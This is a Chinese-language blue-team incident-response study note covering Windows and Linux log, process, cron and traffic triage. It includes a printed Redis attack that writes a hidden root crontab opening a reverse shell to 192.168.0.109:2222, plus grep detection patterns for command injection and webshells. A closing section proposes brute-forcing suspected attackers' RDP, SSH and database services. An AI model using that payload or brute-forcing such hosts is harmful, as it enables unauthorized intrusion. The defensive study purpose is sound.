笔记学习

蓝队应急响应笔记

#Windows排查

日志分析

在线日志筛选工具:https://tilipa.zlsam.com/loger/

日志分类

Web日志
  1. Web日志存放路径

Windows默认路径:在根目录下的logs文件夹中

  1. tomcat日志

包含catalina.out(异常错误的日志)、localhost(类错误的日志)、manager、localhost_access_log 4种格式的日志

  1. apache日志、nginx日志、IIS日志

包含access_log、error_log

系统日志
  1. Windows系统日志包括系统日志、安全日志、应用日志等

在事件查看器的 安全事件 中查看事件id

敏感事件id 事件
4624 登录成功
4625 登陆失败
4720 创建用户
4634 注销成功
4647 用户启动的注销
4672 使用超级用户/超级管理员用户进行登录

在事件查看器的 安全事件 中查看事件id

​ 当黑客创建了隐藏账户(hacker$),那么net user是无法查看的,可以去事件查看器中筛选查看事件id为4720的事件,查看是否创建了隐藏账户

  1. 系统日志分析工具–LogParser
1
2
3
4
5
6
7
8
9
登录成功的所有事件
LogParser.exe -i:EVT -o:DATAGRID "SELECT * FROM Security.evtx(日志路径) where EventID=4624"
指定登录时间范围的事件:
LogParser.exe -i:EVT -o:DATAGRID "SELECT * FROM Security.evtx where TimeGenerated>'2022-06-19 23:32:11' and TimeGenerated
提取登录成功的用户名和IP:
LogParser.exe -i:EVT -o:DATAGRID "SELECT EXTRACT_TOKEN(Message,13,') as
EventType,TimeGenerated as LoginTime,EXTRACT_TOKEN(Strings,5,'|') as Username,EXTRACT_TOKEN(Message,38,'') as Loginip FROM Security.evtx where EventID=4624
登陆失败的所有事件
LogParser.exe -i:EVT -o:DATAGRID "SELECT * FROM Security.evtx where EventID=4625"

文件分析

#文件排查

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
(1)各个盘下的temp相关目录%temp%		//记录文件大,后缀为exe,dll等文件
WIN+R	%temp%

(2)开机启动文件(启动菜单、注册表

(3)浏览器的历史记录

(4)Recent文件
WIN+R	recent

(5)攻击日期内新增的文件,cmd下运行代码
forfiles /m *.exe /d 2022/10/5 /s /c "cmd /c echo @path @fdate @ftime"
		/m:指定类型	/d:指定时间之后
		
(8)使用工具D盾、HwsKill、WebshellKill等

进程分析

#进程分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
(1)查看端口得到PID
netstat -nao | findstr 端口

(2)根据PID查看进程对应的程序名称
tasklist /V | findstr PID
wmic process list brief | findstr PID

(3)得到程序全路径名
wmic process where processid=PID get processid,executablepath,name

(4)杀掉进程
tasklist /pid PID /f
wmic process where name="mysqld.exe" delete
wmic process where processid=PID call terminate

自启动、计划任务

  1. 新增、隐藏账号排查
1
2
3
4
5
6
7
8
9
10
11
12
(1)通过命令:“net user”查看
(2)通过“计算机管理”查看。				lusrmgr.msc
(3)通过Windows安全日志进行排查		eventvwr
(4)通过查看注册表文件进行排查		  regedit

#1 HKEY CLASSES ROOT(HKCR)
#2 HKEY CURRENT USER(HKCU)
#3 HKEY LOCAL MACHINE(HKLM)
#4 HKEY USERS(HKU)

(5)通过Windows管理工具
wmic useraccount get name,SiD
  1. 注册表排查

(1)在注册表此处查看是否有隐藏账户或者影子账号

HKEY_LOCAL_MACHINE——SAM——Account——Users——Names

(2)在注册表此处查看启动项(2种)

HKEY_LOCAL_MACHINE——SOFTWARE——Microsoft——Windows——CurrentVersion——Run

HKEY_CURRENT_USER——Software——Microsoft——Windows——CurrentVersion——Run

(3)计划任务查看

1
schtasks.exe

#Linux排查

关键目录

文件名 说明
/etc/passwd 用户信息文件
/etc/rc.d/rc.local 开机启动项
/root/.ssh root用户ssh公钥和私钥
/tmp 系统或用户临时文件目录
/etc/hosts 本地IP地址域名解析文件
/etc/init.d/ 开机启动项

常用命令

1
2
3
4
5
6
7
8
1、ls -alt

2、free -h:查看系统内存使用情况

3、ps auxf :查看系统进程及子进程		
top :查看CPU占用率				//排查CPU占用率最高的进程

4、netstat -antpl

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
5、lsof -i:port		//查询端口打开的文件
lsof -p pid			//查询进程打开的文件	
lsof -u root		//查询用户打开的文件

6、chattr			//修改文件属性,防止误删除
chattr +i 文件夹	加锁
chattr -i 文件夹	去锁
lsattr				//显示文件属性

7、排查启动项
cat /etc/rc.local
ls -alt /etc/profile.d/*.sh		//sh文件在启动之后会自动加载

8、grep		//查找符合条件的字符串

9、查看计划任务
cat /etc/passwd | cut -f 1 -d : |xargs -l {} crontab -l -u {}	//查询所有用户的计划任务
ls -altr /var/spool/cron/*
more /etc/crontab
more /ete/cron.d/*
more /etc/cron.daily/*
more /etc/cron.hourly/*
more /etc/cron.monthly/*
more /etc/cron.weekly/
more /etc/anacrontab
more /var/spool/anacron/*

10、查看历史命令
history
cat ~/.bash_history		//每个用户都有对应的记录

11、校验RPM软件包
rpm -Va
dpkg -verify
重点关注一下SM5 看是否存在文件权限和所有权不一致

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
12、查看文件(文件夹)详细信息
stat

13、查看文件的时间
find / -mtime 0 -name *.jsp		//查看当前目录下,指定天数内修改的指定类型文件(文件内容的修改)
find / -ctime 0 -name *.jsp		//查看当前目录下,指定天数内新增的指定类型文件(文件类型的修改)

14、比较文件差异
diff -c

15、查看隐藏进程(3步结合)
ps -ef | awk '{print $2}' | sort -n | uniq > ps.p	//导出所有的PID号到ps.p
ls /proc | sort -n | uniq > proc.p					//导出所有的进程文件号打印出来
diff ps.p proc.p									//比较区别

16、查看用户登录历史记录
last

17、查看用户登陆失败记录
lastb

18、查看用户最近一次登录信息		//会显示/etc/passwd中所有用户的最近登录信息
lastlog

应急工具

Busybox

1
./busybox netstat -antlp

unhide

1
2
3
4
5
一款检测发现那些借助rootkit及其它技术隐藏的进程和TCP/UDP端口的命令行工具
可以判断系统是否存在隐藏进程

unhide proc		//检测隐藏进程
unhide sys		//检测隐藏系统文件

chkrootkit

rootkit是Linux平台下最常见的一种木马后门工具,它主要通过替换系统文件来达到入侵和隐蔽的目的,这种木马比普通木马后门更加危险和隐蔽,普通的检测工具和检查手段很难发现这种木马。rootkit攻击能力极强,对系统的危害很大,它通过一套工具来建立后门和隐藏行迹,从而让攻击者保住权限,以使它在任何时候都可以使用root权限登录到系统。

  • rootkit主要有两种类型:文件级别内核级别
  1. 文件级别的rootkit:

​ 一般是通过程序漏洞或者系统漏洞进入系统后,通过修改系统的重要文件来达到隐藏自己的目的。在系统遭受rootkit攻击后,合法的文件被木马程序替代,变成了外壳程序,而其内部是隐藏着的后门程序。通常容易被rootkit替换的系统程序有login、ls、ps、ifconfig、du、find、netstat等。文件级别的rootkit,对系统维护很大,目前最有效的防御方法是定期对系统重要文件的完整性进行检查,如Tripwire、aide等。

  1. 内核级别rootkit:

​ 是比文件级rootkit更高级的一种入侵方式,它可以使攻击者获得对系统底层的完全控制权,此时攻击者可以修改系统内核,进而截获运行程序向内核提交的命令,并将其重定向到入侵者所选择的程序并运行此程序。内核级rootkit主要依附在内核上,它并不对系统文件做任何修改。

1
2
3
4
5
chkrootkit是一款用于UNIX/Linux的本地rootkit检查工具,用于检查系统上已知的rootkit。它通过检查通常与rootkit相关的特定文件、目录和字符串,扫描系统以查找rootkit安装的任何迹象
检测是否被植入后门、木马、rootkit

直接运行/usr/local/chkrootkit/chkrootkit
在kail中自带,可以使用chkrootkit -n

Rkhunter

1
2
3
rkhunter是Linux系统平台下的一款开源入侵检测工具,具有非常全面的扫描范围,除了能够检测各种已知的rootkit特征码以外,还支持端口扫描、常用程序文件的变动情况检查。

rkhunter --check --sk

运行rkhunter检查系统它主要执行下面一系列的测试:

1. MD5校验测试, 检测任何文件是否改动.
2. 检测rootkits使用的二进制和系统工具文件.
3. 检测特洛伊木马程序的特征码.
4. 检测大多常用程序的文件异常属性.
5. 执行一些系统相关的测试 - 因为rootkit hunter可支持多个系统平台.
6. 扫描任何混杂模式下的接口和后门程序常用的端口.
7. 检测如/etc/rc.d/目录下的所有配置文件, 日志文件, 任何异常的隐藏文件等等. 例如, 在检测/dev/.udev和/etc/.pwd.lock文件时候, 我的系统被警告.
8. 对一些使用常用端口的应用程序进行版本测试. 如: Apache Web Server, Procmail等.

ClamAV

1
一款用于检测木马、病毒、恶意软件和其他恶意威胁的开源防病毒引擎。

WebShell查杀-河马

1
https://www.shellpub.com/

内存马查杀-java-memshell-scanner

1
https://github.com/c0ny1/java-memshell-scanner

日志分析

日志存放位置

/www/admin/localhost

web日志

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
(1)列出当天访问次数最多的IP命令(确认攻击者IP)
cut -d- -f 1 log_file | uniq -c | sort -rn | head -20

cut -d- -f 1 log_file:
	cut 命令提取文件 log_file 中的内容。
	-d- 指定 - 作为字段分隔符。
	-f 1 表示提取每行的第一个字段。
	这部分的意义是从 log_file 中提取每行 - 分隔符前面的内容。
uniq -c:
	uniq 命令用于过滤掉重复的行。
	-c 选项使 uniq 在输出的每一行前加上该行出现的次数。
	这部分会统计 cut 提取出来的第一个字段的出现次数。
sort -rn:
	sort 命令用于对输入的行进行排序。
	-r 选项表示逆序排序(从大到小)。
	-n 选项表示按照数值进行排序,而不是字典序。
	这部分的作用是将 uniq 输出的行按照出现次数进行降序排列。
head -20:
	head 命令用于输出前 N 行。
	-20 表示输出前 20 行。
	这一部分会最终列出出现次数最多的前 20 个字段。

(2)查看每一个IP访问了多少个页面
awk '{++S[$1]} END {for (a in S) print a, S[a]}' log_file  

awk '{++S[$1]}' log_file:
	awk 是一个强大的文本处理工具。
	{++S[$1]}:每当读取到一行,$1 表示该行的第一个字段。S[$1] 是一个 associative array(关联数组),用于记录第一个字段出现的次数。++S[$1] 对该字段的计数加 1。
	log_file 是要处理的文件。
END {for (a in S) print a, S[a]}:
	END {...} 块在输入文件的所有行处理完后执行。
	for (a in S) 遍历数组 S,其中 a 是数组中的每一个键(即第一个字段的不同值)。
	print a, S[a]:打印出字段 a 和它的计数 S[a]。

(3)看某一个页面被访问的次数(确认木马文件)
grep "/index.php" log_file | wc -l

grep "/index.php" log_file:从名为 log_file 的日志文件中查找包含 /index.php 的所有行。grep 是一个用于文本搜索的命令,它会返回所有匹配的行。
|:这个符号是管道操作符,它将前一个命令的输出传递给后一个命令。
wc -l:wc 是一个用于计算文本行数、单词数和字节数的命令。选项 -l 表示只计算行数。

(4)查看某一个IP访问了哪些页面
grep 192.168.1.132 log_file | awk '{print $1,$7}'

常用命令:find、awk、cat、grep

find:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
(1)find 文件名
-name:区分大小写
-iname:不区分大小写
find -name "*.php"
find -type f -name "*.php" | xargs grep 'eval' | more	//查看php文件中包含eval的文件内容

(2)find 文件类型
-type:f(普通文件) d(目录) i(软链接)

(3)按照文件大小
-size: +50k(找比50k大的文件) -100k(找比100k小的文件)		//M、G为大写,k为小写

(4)按照修改时间
-atime(访问时间)	-mtime(最后修改内容的时间)	-ctime(文件的状态改变时间(例如,权限修改,文件名更改等),除了文件内容修改的)
+5:6天前修改的文件		20号(今天)--> 14号之前修改的文件
-5:5天内修改的文件		20号(今天)--> 15-20号修改的文件
5:精确到5天前		 20号(今天)--> 15号修改的文件
find -mtime 0 -name "*.php"		//24h内修改的文件

(5)权限
-perm:查看权限
find -iname "*.php" -perm 777

(6)所属组所有者
-uid
-gid
-user 用户名
-nouser	没有所属组的文件
find -user root		//查找哪些文件是root的
find -nouser		//查找没有所有者的文件,看是不是外来垃圾文件

(7)逻辑运算
-a:	逻辑与(&)
-o:逻辑或(|)
-not:逻辑非
find -mtime -3 -a -perm 777 	//3天内权限为777的文件
find -name php -o -name jsp		//文件为php或jsp的

awk:awk [选项]’匹配规则处理规则’ 路径

1
2
3
4
5
6
7
8
9
10
匹配规则:正则表达式
处理规则:设置变量、数组,定义函数,加减运算,字符串拼接
联合sort -n去排序,uniq去除重复行配上-c计数参数
sort -n | uniq > 1 -c
$1:第一列

awk '{print substr($4,2,11)}' log_file | sort | uniq -c

-F:指定分隔符,默认为空格
awk -F: 'length($2)==0 {print $1}' /etc/shadow

grep:查找文件中的字符内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
-c:统计行数
-v:去掉这一行的内容打印
ps -ef | grep ssh | grep -v grep

ps -ef:这个命令用于显示系统中所有进程的详细信息。
	-e 选项表示显示所有用户的所有进程。
	-f 选项表示以完整格式(full format)显示进程信息,包括 UID、PID、PPID、C、STIME、TTY、TIME 和 CMD 等字段。
|:这个管道符号将前一个命令的输出传递给下一个命令。
grep ssh:这个命令过滤出包含 "ssh" 字符串的行。这意味着它会找出所有 SSH 相关的进程。
grep -v grep:这个命令会排除任何包含 "grep" 字符串的行。因为在使用 grep 时,该命令本身也会被列为一个进程,使用 -v 选项可以反向匹配,从而过滤掉这行。

find ./ -name "*.php" | xargs grep "eval()"
	xargs:用于将输入转换为命令行参数,并执行后面的命令。
	
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
(1)SQL注入检攻击检测
grep -E -i "select" log1
	-E:这个选项表示使用扩展的正则表达式 (Extended Regular Expression)。这使您能够使用一些额外的正则表达式特性,例如 +、? 等。
	-i:此选项表示不区分大小写,即在搜索时 "select" 会匹配 "SELECT"、"Select" 等不同大小写的形式。

(2)xss跨站脚本攻击检测
grep -E -i " (S)%26%23x3c%3B(S+)%3E|(S)%26%23x3c%3B(S+)%2F%3E|(S+)<(S+)>|(S+)<(S+)/" log1

(S)%26%23x3c%3B(S+):
	%26%23x3c 是 HTML 实体,表示 < 符号。也就是说,该部分寻找形如 S<S+ 的字符串。
|: 逻辑“或”操作符,用于连接多个表达式。
(S)%26%23x3c%3B(S+)/:
	这个部分类似于前面的,但它表示寻找形如 S<S+/ 的字符串(即自闭合标签)。
(S+)&#x3c;(S+)>:
	这里找到的是 S<S+> 的形状,这里 &#x3c; 同样表示 <。
(S+)&#x3c;(S+)/:
	F这个部分寻找传递形如 S<S+/ 的字符串。

(3)命令注入攻击攻击检测
grep -E -i "ping%20-c%20|ls%20|cat%20|%20pwd|net user" log1

(4)网站被植入webshell后门检测
grep -E -i "eval|%eval|%execute|%3binsert|%20makewebtaski|/1.asp|/1.jsp|/1.php|/1.aspx %if" log1

(5)暴力破解账号攻击检测
grep -E -i "login" /www/logs/access.log | grep -E -i "POST" | grep -E -i "200"

系统日志

日志文件 说明
/var/log/cron 定时任务相关日志
/var/log/cups 打印信息的日志
/var/log/dmeslog 系统在开机时内核自检的信息
/var/log/auth.log 系统授权信息,用户登录和使用的权限机制等
/var/log/message 系统重要信息的日志
/var/log/btmp 错误登录日志
/var/log/lastlog 系统中所有用户最后一次登录时间的日志
/var/log/wtmp 永久记录所有用户的登录、注销信息,同时记录系统的启动、重启、关机事件
/var/log/utmp 当前已经登录的用户信息

系统安全安全日志

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
cat /var/log/secure 		Centos

Apr 17 10:25:37 VM-0-17-centos sshd[18083]:Accepted publickey for root from 45.79.126.79 port 5729 ssh2: RSA SHA256:av1LzEMVmLIn1gDyaaMc8LWyqx6KGLzjRa57Zvx7+ac
-Apr1710:25:37:事件发生的日期和时间,以月、日、小时和分钟的格式表示。
-VM-0-17-centos:事件发生的机器的主机名。
-sshd[18083]:服务的名称(sshd)和与事件相关的进程ID(18083)。
-Acceptedpublickey:公钥身份验证成功。
-for root:验证的用户帐户是root。
-from 45.79.126.79 port 5729 	ssh2:来自IP地址45.79.126.79且SSH连接的端口是5729。

查找每个IP地址的失败登录次数:
awk '/sshd.*Failed/{print $(NF-3)}' /var/log/secure | sort | uniq -c| sort -nr

查找特定IP地址的失败登录:
grep "sshd.*Failed.*from <IP_ADDRESS>" /var/log/secure | awk '{print $1,$2,$3,$9,$11}'

查找特定IP地址的成功登录:
grep "sshd.*Accepted.*from <IP_ADDRESS>" /var/log/secure | awk '{print $1,$2,$3,$9,$11}'


cat /var/log/auth.log 		Ubuntu

vim /etc/rsyslog.conf 查看日志存放位置

比较重要的几个日志

登陆失败记录:/var/log/btmp //输入lastb直接查看

登陆成功记录:/var/log/wtmp //输入last直接查看

目前登陆用户信息:/var/log/utmp 

1
2
3
4
5
6
7
8
9
10
11
last 命令:
功能说明:列出目前与过去登入系统的用户相关信息。
  语  法:last [-adRx][-f ][-n ][帐号名称...][终端机编号...]
  补充说明:单独执行last指令,它会读取位于/var/log目录下,名称为wtmp的文件,并把该给文件的内容记录的登入系统的用户名单全部显示出来。
  参  数:
  -a  把从何处登入系统的主机名称或IP地址,显示在最后一行。
  -d  将IP地址转换成主机名称。
  -f   指定记录文件。
  -n 或-  设置列出名单的显示列数。
  -R  不显示登入系统的主机名称或IP地址。
  -x  显示系统关机,重新开机,以及执行等级的改变等信息。

密码验证失败

1
grep "Fail password" /var/log/auth.log | wc -l

密码验证成功

1
grep "Accepted password for" /var/log/auth.log
1
lsof -i:22	//查看是否开启22端口

查看每个ip失败的次数

1
2
3
4
5
6
7
8
9
10
11
12
grep "Failed password" /var/log/auth.log | awk '(if (NF==16) {c[$13]++}else{c[$11]++}}END{for(u in c)print u,c[u]}' | sort -k 2 -nr | head

grep "Failed password" /var/log/auth.log:
	从 /var/log/auth.log 文件中提取包含 "Failed password" 的所有行。这通常表示登录失败的尝试。
awk '(if (NF==16) {c[$13]++}else{c[$11]+ }):
	awk 命令用于处理文本行。在这里,使用 NF 变量(表示当前行的字段数)来判断行的结构。如果字段数为 16,则增加关联数组 c 中,以 \$13(通常表示失败尝试的用户名或 IP 地址)为索引的计数。如果字段数不是 16,则使用 \$11(通常表示失败尝试的用户名或 IP 地址)来增加计数。
END{for(u in c)print u,c[u]}:
	在处理完所有输入后,输出数组 c 的内容,打印每个用户名(或 IP 地址)及其对应的失败登录尝试次数。
sort -k 2 -nr:
	对输出进行排序,按第二列(即失败尝试次数)进行降序排序。
head:
	显示排序后的前几行(默认是 10 行),这些行显示了最频繁的失败密码尝试者。

查看每个用户名失败的次数

1
grep "Failed password" /var/log/auth.log | awk '{if (NF==16) {c[$11]++}else{c[$9]++}}END{for(u in c)print u,c[u]}' | sort -k 2 -nr | head

查看是否有与uid=0的(与root同权限的用户)

1
awk -F: '$3==0{print $1}' /etc/passwd

查看是否有空口令账户

1
awk -F: 'length($2)==0 {print $1}' /etc/shadow

进程分析

进程和网络连接状态

网络连接命令netstat

1
2
3
4
5
6
7
8
9
10
11
12
-a: 显示所有连接和监听的端口。
-t: 显示 TCP 连接。
-u: 显示 UDP 连接。
-l: 仅显示在监听状态的服务。
-n: 以数字形式显示地址和端口号,而不是尝试解析服务名。
-p: 显示哪个进程在使用该 socket(需要 root 权限)。
-r: 显示路由表。
-i: 显示网络接口的信息。
-s: 显示网络统计信息。
-c: 持续输出网络状态,直到手动停止(Ctrl+C)。

## netstat -antp

查看可疑进程的对应可执行程序

1
## ls -alt /proc/PID

查看可疑进程打开了哪些文件

1
2
3
4
5
## lsof -p PID 			
	lsof(List Open Files): 命令本身,用于列出当前系统中打开的文件。
	-p: 这个选项后接一个进程 ID (PID),用于指定要查询的特定进程。
	PID: 代表进程 ID,是一个数字,指的就是你想查看的进程的具体 ID。
	运行 lsof -p PID 可以帮助你了解该进程打开了哪些文件,包括常规文件、设备文件、网络套接字等。这在排查问题、监控进程状态和进行系统性能调优时非常有用。

查看隐藏进程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
## ps -ef | awk '{print}' | sort -n | uniq > 1

ps -ef:
	这个命令用于列出当前系统中的所有进程,-e 选项表示显示所有用户的进程,-f 选项表示以完整格式显示。这将输出每个进程的详细信息。
|:
	管道符用于将左侧命令的输出作为右侧命令的输入。
awk '{print}':
	awk 是一个文本处理工具。在这里,'{print}' 将输入的每一行打印出来。实际上,这一步并没有改变输出,只是再次输出了 ps -ef 的结果。
sort -n:
	sort 命令用于对输入进行排序。-n 选项表示按数值进行排序,但因为没有具体的排序字段,这一步可能不太有意义,尤其是在处理进程信息时。它会对整行进行字典排序。
uniq:
	uniq 用于去除重复的行。由于 uniq 只能删除相邻的重复行,所以通常在此之前要使用 sort 命令,以确保相同的行在一起。
> 1:
	将最终的输出重定向到名为 1 的文件中。如果该文件已存在,则内容会被覆盖。


## ls /proc | sort -n | uniq > 2

ls /proc:
	ls 命令用于列出指定目录中的文件和子目录。在这个上下文中,它将列出 /proc 目录中的所有条目。/proc 是一个虚拟文件系统,包含关于当前系统进程和内核的信息。这里的输出通常会是许多进程 ID(数字)和一些其他系统信息(如 sys, self, uptime 等)。
|:
	管道符,将 ls 的输出传递给下一个命令。
sort -n:
	sort 命令用于对输入内容进行排序,-n 选项表示按数值顺序排序。这对于 /proc 目录下的数字(表示进程 ID)是合适的,因为它们可以根据数值大小进行有效排序。
uniq:
	uniq 命令用于去除重复的行。由于 ls 输出的内容已经按照数字排序,因此 uniq 将删除相邻的重复行。虽然在通常情况下,/proc 目录中的文件条目不会有重复的进程 ID,但如果有其他类型的文件名重复,它也会被去掉。
> 2:
	这个部分用于将最终的输出重定向到名为 2 的文件中。如果文件 2 已存在,内容将被覆盖。如果文件不存在,则会创建一个新文件

计划任务

计划任务路径

1
2
/var/spool/cron/crontabs
/var/spool/cron/root

查看计划任务

1
crontab -u root -l

redis写隐藏计划任务

1
2
3
4
5
6
set shell "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.0.109/2222 0>&1\n\n"
config set dir /var/spool/cron/
config set dbfilename root
save

crontab -u root -l 这个命令是无法查看redis这个隐藏计划任务的,只能去/var/spool/cron/root里查看

#流量分析

Wireshark的使用

网卡选择模式

开启混杂模式
局域网的所有流是都会发送给我们的电脑,默认情况下,我们的电脑只会对自己mac的流是进行解包,而丢弃其他mac的数据包。
开启混杂模式后,我们就可以解析其他mac的数据包,因此,我们使用Wireshark时,通常都会开启混杂模式。
点击菜单栏的[捕获」按钮,点击[选项]

过滤器

1、捕获过滤器

在抓包之前就设定好过滤条件,然后只抓取符合条件的数据包

1
2
3
4
5
6
7
8
9
10
过滤基本的语去格式:BPF语法格式。
1)BPF语法
BPF(全称Berkeley Packet Filter),中文叫伯克利封包过滤器,它有四个核心元素:类型、方向、协议和逻辑运算符。
1.类型Type:主机(host)、网段(net)、端口(port)
2.方向Dir:源地址(src)、目标地址(dst)
3.协议Proto:各种网络协议,比如:tcp、udp、http
4.逻辑运算符:与(&&)、或(II)、非(!)
四个元素可以自由组合,比如:
1. src host 192.168.31.1:抓取源IP为192.168.31.1的数据包
2. tcp || udp:抓取 TCP 或者 UDP 协议的数据包

2、显示过滤器

在已捕获的数居包集合中设置过滤条件,隐藏不想显示的数据包,只显示符合条件的数据包。

1
2
3
4
5
6
7
8
9
10
11
显示过滤器的语法包含5个核心元素:IP、端口、协议、比较运算符和逻辑运算符。
1.IP地址:ip.addr、ip.src、ip.dst
2.端口:tcp.port、tcp.srcport、tcp.dstport
3.协议:tcp、udp、http
4.比较运算符:> < == >= <= !=
5.逻辑运算符:and、or、not、xor(有且仅有一个条件被满足)

5个核心元案可以自由组合,比如:
- ip.addr == 192.168.32.121:显示IP地址为192.168.32.121的数据包
- tcp.port == 80:显示端口为80的数据包
使用方法:在过滤栏输入过滤语句,修改后立即生效

3、过滤器具体写法

显示过滤器写法

1
2
3
4
5
6
1、过滤值比较符号及表达式之间的组合
2、针对ip的过滤
3、针对协议的过滤
4、针对端口的过滤(视传输协议而定)
5、针对长度和内容的过滤
5、针对http请求的一些过滤实例。

捕捉过滤器写法

1
2
1、比较符号
2、常用表达式实例

注意:这两种过滤器所便用的语法是完全不同的,捕捉网卡数据的其实并不是Wireshark,而是WinPcap,当然要按WinPcap的规则来,显示过滤器就是Wireshark对已捕捉的数据进行筛选。

使用捕获过滤器的主要原因就是性能。如果你知道并不需要分析某个类型的流量,那么可以简单地便用捕获过滤器过滤掉它,从而节省那些会被用来捕获这些数据包的处理器资源。当处理大是数据的时候,使用捕获过滤器是相当好用的。

Wireshark拦截通过网卡访问的所有数据,前提是没有设置任何代理。Wireshark不能拦截本地回环访问的请求,即127.0.0.1或者localhost。

4、显示过滤器具体写法

  1. 针对ip的过滤
1
2
3
4
5
6
7
8
9
10
(1)源地址进行过滤
ip.src == 192.168.0.1

(2)对目的地址进行过滤
ip.dst == 192.168.0.1

(3)对源地址或者目的地址进行过滤
ip.addr == 192.168.0.1
如果想排除以上的数据包,只需要用括号,然后使用"!"即可
!(ip.addr == 192.168.0.1)
  1. 针对协议的过滤
1
2
3
4
5
6
7
(1)获某种协议的数据包,表达式很简单仅仅需要把协议的名字输入即可
http
注意:是区分大小写,只能为小写
(2)捕获多种协议的数据包
http or telnet
(3)排除某种协议的数据包
not arp 或者 !tcp
  1. 针对端口的过滤(视传输协议而定)
1
2
3
4
(1)捕获某一端口的数据包(以tcp协议为例)
tcp.port == 80
(2)捕获多端口的数据包,可以使用and来连接,下面是捕获高于某端口的表达式(以udp协议为例)
udp.port >= 2048
  1. 针对长度和内容的过滤
1
2
3
4
5
6
7
8
(1)针对长度的过虑(这里的长度指定的是数据段的长度)
udp.length < 20		http.content_length <= 30s
(2)针对uri内容的过滤
http.request.uri matches 'user'(请求的uri中包含"user"关键字的)
注意:matches后的关键字是不区分大小写的!

http.request.uri contains 'user'(请求的uri中包含“user"关键字的)
注意:contains后的关键字是区分大小写的!
  1. 针对http请求的一些过滤实例
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
(1)过滤出请求地址中包含“user”的请求,不包括域名;
http.request.uri contains 'user'
(2)精确过滤域名
http.host == baidu.com
(3)模糊过滤城名
http.host contains 'baidu'
(4)过滤请求content_type类型
http.content_type =='text/html'
(5)过滤http请求方法
http.request.method=='POST'
(6)过滤tcp端口
tcp.port == 80
http && tcp.port == 80 or tcp.port == 5566
(7)过滤http响应状态码
http.response.code == 302
(8)过滤含有指定cookie的http数据包
http.cookie contains 'userid'

比较符号
与:&(and)
或:|(or)
非:!(not)
实例:
src or dst portrange 6000-8000 && tcp or ip6

#溯源的方法

入场前期工作

1 明确网络区域划分

DMZ区、办公终端区、核心业务区、上下游公司、供应链接入区

2 明确现有安全设备

设备类型

网络层设备、终端层设备、蜜罐、日志汇总态势类

设备覆盖范围
现有告警质量

告警种类、告警误报评估

3 已有资产梳理

公网暴露资产

IP、域名、运行服务、中间件、账号口令、源码泄露、远程接入点(VPN、RDP、VNC、远程终端管理系统)

内网资产

IP、系统版本、开放服务、账号口令、重点关注资产(域控机器、运维人员机器、堡垒机、自动化运维、邮件系统、OA、wiki等)

4 公司运营业务数据(防钓鱼)

公司内部组织架构、上下游公司、运维 IT 财务 人事等部门信息 以及相关人员对接信息、通信手段 通信格式等

溯源反制

从蜜罐收集到可疑的IP或域名

主动访问扫描探测

Web

通过ip扫描出的web页面

1、个人博客–昵称简介备案等信息

2、红队设施–弱口令、爆破、其他漏洞

爆破

1、RDP

2、SSH爆破

3、FTP爆破

4、各类数据库(MySQL、MSSQL、Redis、MongoDB)

情报搜集

威胁情报、沙箱

360、奇安信、微步

搜索引擎

1、百度、谷歌

2、fofa、zoomeye–历史资产服务、现有资产服务

阿里云、腾讯云、华为云

1、IP找回账号

2、域名找回账号

IP定位

http://www.ipplus360.com/about/us

得到攻击者信息后

攻击者信息:虚拟IP、手机号码、姓名、邮箱、QQ号